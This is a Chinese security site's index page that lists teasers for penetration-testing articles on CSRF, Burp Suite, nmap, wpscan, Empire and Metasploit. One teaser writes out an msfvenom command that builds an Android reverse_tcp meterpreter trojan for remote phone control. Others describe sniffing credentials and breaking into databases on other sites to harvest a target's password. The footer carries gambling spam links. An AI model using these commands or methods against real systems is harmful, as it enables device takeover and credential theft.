安基网 欢乐生肖 安全渗透测试
订阅

渗透测试

  • 渗透测试之CSRF代码漏洞的检测与加固方案

    渗透测试之CSRF代码漏洞的检测与加固方案
    XSS跨站以及CSRF攻击,在目前的渗透测试,以及网站漏洞检测中 ,经常的被爆出有高危漏洞,我们在对客户网站进行渗透测试时,也常有的发现客户网站以及APP存在以上的漏洞,其实CSRF以及XSS跨站很容易被发现以及利用,在收集客户网站域名,以及其他信息的时候,大体的注意一些请求操作,前端输入,get,po ...
    2019-9-7 03:36
  • 渗透测试:Burp suite 之 Burp Collaborator模块

    渗透测试:Burp suite 之 Burp Collaborator模块
    我们在做渗透测试的时候,经常会遇到这种情况,测试跨站可能有些功能插入恶意脚本后无法立即触发或者是盲注跨站这种。解决办法是,我们需要一个外部的独立的服务器,可以通过域名 url 进行访问。而Burp 给我们提供了这个外部服务器,叫 Collaborator,一起来了解下吧~Burp Collaborator的介绍Burp suit ...
    2019-9-1 00:25
  • Psnuffle 口令探测

    Psnuffle 口令探测
    Psnuffle 口令嗅探——ftp示例进入渗透框架msf输入命令:use auxiliary/sniffer/psnuffle原理:(截获常见协议下的ftp、imap、pop3、smb、url等身份认证过程,记录用户名和密码)换句话说,只要在网段中进行此模块监听,网段中的任何主机只要访问任何一台网段中的某台ftp服务器,监听端主机就会自动截 ...
    2019-8-31 01:03
  • Kali Linux 下10个常用渗透工具

    Kali Linux 下10个常用渗透工具
    Nmap(即 “网络映射器”)是 Kali Linux 上最受欢迎的信息收集工具之一。换句话说,它可以获取有关主机的信息:其 IP 地址、操作系统检测以及网络安全的详细信息(如开放的端口数量及其含义)。它还提供防火墙规避和欺骗功能。2、LynisLynisLynis 是安全审计、合规性测试和系统强化的强大 ...
    2019-8-29 13:34
  • 做网站渗透测试,可以从哪方面入手?

    做网站渗透测试,可以从哪方面入手?
    1. 信息收集:获取域名的whois信息,获取注册者邮箱姓名电话等。niubila@vip.qq.com 如果目标站无漏洞,那么去其他站包含qqqq@vip.qq.com为用户名的站,拿下数据库,查密码18511112222;包含18511112222为用户名的站,拿下数据库,查密码注册时间:查询服务器旁站以及子域名站点,因为主站一般比较难, ...
    2019-8-28 01:07
  • PentestBox入门实战教程(windows渗透神器)

    PentestBox入门实战教程(windows渗透神器)
    PentestBox是一款Windows平台下预配置的便携式开源渗透测试环境。PentestBox不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。它打包了所有的安全工具,并且可以在Windows系统中原生地运行,有效地降低了对虚拟机或者双启动环境的需求。在新闻报道中有提到该工具,详细请看之前不试你可能会后 ...
    2019-8-26 00:26
  • 渗透测试之业务流量通用抓包方法及自动化漏洞扫描

    渗透测试之业务流量通用抓包方法及自动化漏洞扫描
    前言在移动互联的时代,手机端业务越来越多,渗透测试中经常会遇到安卓APP和各种微信/支付宝小程序,以APP为例,很多APP目前都会在发起网络请求前先判断手机网络是否使用了代理,如果使用了代理就不请求接口,那么我们就无法抓取数据包进行分析了。想到之前内网渗透中经常使用Proxifier进行流量转发, ...
    2019-8-23 01:10
  • 给你一个网站做渗透测试你可以从哪方面入手

    给你一个网站做渗透测试你可以从哪方面入手
    1,信息收集:#,获取域名的whois信息,获取注册者邮箱姓名电话等。@ qqqq@vip.qq.com 如果目标站无漏洞,那么去其他站包含qqqq@vip.qq.com为用户名的站,拿下数据库,查密码@ 18511112222;包含18511112222为用户名的站,拿下数据库,查密码@ 注册时间:# 查询服务器旁站以及子域名站点,因为主站一般 ...
    2019-8-21 11:31
  • 黑客渗透攻击必备环境DVWA简介及搭建

    黑客渗透攻击必备环境DVWA简介及搭建
    DVWA(Damn Vulnerable Web App)是一个基于PHP/MySql搭建的Web应用程序,旨在为安全专业人员测试自己的专业技能和工具提供合法的 环境,帮助Web开发者更好的理解Web应用安全防范的过程。DVWA一共包含十个模块分别是:1.Bruce Force //暴力破解2.Command In ...
    2019-8-6 13:16
  • 测试人员渗透测试必备技能-Burpsuite

    测试人员渗透测试必备技能-Burpsuite
    Burpsuite 是用于攻击web 应用程序的集成平台。它包含了许多Burp工具,这些不同的Burp工具通过协同工作,有效的分享信息,支持以某种工具中的信息为基础供另一种工具使用的方式发起攻击。这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性, ...
    2019-7-28 13:41
  • 信息收集:kalilinux下nmap的常用命令,黑客安全渗透必备知识

    信息收集:kalilinux下nmap的常用命令,黑客安全渗透必备知识
    nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。它是网络管理员必用的软件之一,以及用以评估网络系统安全安装: sudo apt install nmap -ynmap主机发现扫码Ping扫描: 批量扫描一个网段的主机存活数. nmap -s ...
    2019-7-23 16:18
  • kali黑客系统wpscan工具扫描wordpress漏洞入侵攻击测试教程

    kali黑客系统wpscan工具扫描wordpress漏洞入侵攻击测试教程
    WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robo ...
    2019-7-23 16:17
  • 渗透神器Empire工具的简单利用

    渗透神器Empire工具的简单利用
    大家好,我是陌缘,今天给大家介绍一下后渗透神器,empire的使用方法~。首先我们先简单的介绍一下,什么是Empire(TA是干什么用的) 首先,empire,Empire 是一个纯粹的 PowerShell 后开发代理建立在密码安全的通信和灵活的架构。Empire实现了无需 powershell.exe 即可运行 PowerShell代理的功能,从键盘记录 ...
    2019-7-22 14:09
  • 测评:让自动化渗透测试更方便可靠的HaXM

    测评:让自动化渗透测试更方便可靠的HaXM
    HaXM 是自动化渗透测试项目的合理进化,不仅提供方便配置的持续扫描,还能给出帮助修复问题的建议。今天的企业网络复杂到令人叹为观止,一个小小的配置错误就能整个企业暴露在危险的漏洞和攻击之下。想要抢在黑客之前发现这些问题,网络安全团队通常会执行所谓的红队演练,也就是让训练有素的攻击者尝 ...
    2019-7-13 14:01
  • Kali Linux实战篇:使用Msfvenom生成木马实现远程控制安卓手机

    Kali Linux实战篇:使用Msfvenom生成木马实现远程控制安卓手机
    声明:本头条号【Kali技术】所有分享,仅限学习交流!请勿他用!先看Kali的ip,我的是192.168.0.101然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R /root/apk.apk这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多 ...
    2019-7-1 12:39
  • 最新
    热门
    返回顶部
    安徽快3 内蒙古快三走势图 山东群英会直播 快乐赛车 北京赛车 彩票高賠率好平台 广西快3计划 欢乐生肖 德国时时彩 极速11选5